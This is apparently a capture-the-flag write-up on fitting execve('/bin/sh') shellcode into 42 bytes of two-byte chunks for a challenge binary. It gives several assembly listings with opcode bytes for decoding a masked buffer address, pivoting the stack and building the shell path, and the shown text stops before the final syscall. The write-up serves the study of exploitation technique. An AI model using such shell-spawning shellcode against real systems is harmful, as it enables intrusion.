Description: We proudly present: Code Execution as a Service (CEaaS), now on x86-64!
(Flag filename is randomized.)
Essentially the binary accepts 42 bytes of shellcode which is split up in groups of two bytes connected via short jumps.
Code execution occurs in a RX buffer and just before our shellcode starts, most of the registers are filled with random data.
Immediately after our 42 bytes of shellcode, we hit a
syscall followed by
0xcd are filtered out so we can’t call
syscall before this point.
During initialization, the program also mmap’s an empty RW buffer (size 0x1000) at a 32-bit address and stores it’s encoded address in the memory region that will be
pop'ed into all the registers before our shellcode.
Therefore, it just so happens that
rax ^ rdi ^ 0xa07a6c393a248ca1 ==
Our goal is to have the final
execve("/bin/sh", 0, 0) and spawn a shell.
Initially, all of the registers are randomized and we don’t have a pointer to memory to store
So our first step needs to be decoding the address of the
RW buffer pointer.
Then we can pivot our stack to this point and use
push instructions to store the string.
42 bytes is very constrained for this problem. Initially, we developed “working” shellcode in 52 bytes and spent a while optimizing it to fit the size requirements.
Step 1: Decoding
Since our RW buffer has a 32 bit address, we can optimize the decoding to
eax ^ edi ^ 0x3a248ca1 ==
xor eax, 0x12345678 will also zero the top dword of
rax which is handy)
So how can we load a 32 bit constant using only two-byte (or one-byte) instructions?
Our first approach involed loading 16 bits and then shifting.
rol ebx, <constant> is three bytes but
rol ebx, 1 is only two bytes.
Therefore we can set
ecx and use the
loop command to do this 16 times:
(Version 1: 18 bytes)
31 c9 :: xor ecx, ecx b7 3a :: mov bh, 0x3a b3 24 :: mov bl, 0x24 b1 10 :: mov cl, 0x10 d1 c3 :: rol ebx, 1 e2 e8 :: loop b7 8c :: mov bh, 0x8c 31 d8 :: xor eax, ebx 31 c7 :: xor edi, eax
loop command involves brute forcing half a byte of random jump lengths to hit the previous 2-byte chunk.
At the end of this,
edi points into the RW buffer (we ignore the bottom byte of the key to save two bytes).
I started looking for a way to do this with magic constants and came up with:
(Version 2: 18 bytes) - no brute force
31 c7 :: xor edi, eax 31 c0 :: xor eax, eax 31 c9 :: xor ecx, ecx b0 f6 :: mov al, 0xf6 b4 5a :: mov ah, 0x5a b1 a3 :: mov cl, 0xa3 b5 a3 :: mov ch, 0xa3 f7 e9 :: imul ecx 31 c7 :: xor edi, eax
This version uses the fact that
0xa3a3 * 0x5af6 = 0x3a248ca2
Eventually noopnoop suggested finding a perfect square so we could get rid of some
Shortly after, r3ndom found that
0x7a00 * 0x7a00 ==
0x3a240000 which is very nice.
Using this property, I wrote the following:
(Version 3: 12 bytes)
31 c7 :: xor edi, eax 31 c0 :: xor eax, eax b4 7a :: mov ah, 0x7a f7 e8 :: imul eax b4 8d :: mov ah, 0x8d 31 c7 :: xor edi, eax
Step 2: shell
The second part of the shellcode needs to setup the arguments for
execve using the newly found buffer.
Our general approach was to use the pattern:
mov cl, 0x12 mov ch, 0x34 push cx
This snippet pushes two bytes to the stack and only takes up 6 bytes total.
Our final shellcode for this part looks like:
89 fc :: mov esp, edi # pivot stack 5e 58 :: pop rsi; pop rax # zero rsi and rax (useful for later) b5 'h' :: mov ch, 'h' b1 's' :: mov cl, 's' 66 51 :: push cx b5 '/' :: mov ch, '/' b1 '/' :: mov cl, '/' 66 51 :: push cx b7 'n' :: mov bh, 'n' b3 'i' :: mov bl, 'i' 66 53 :: push bx b5 'b' :: mov ch, 'b' 66 51 :: push cx 54 5f :: push rsp; pop rdi b0 3b :: mov al, 59
Here we actually write
/bin//sh to save an extra two bytes.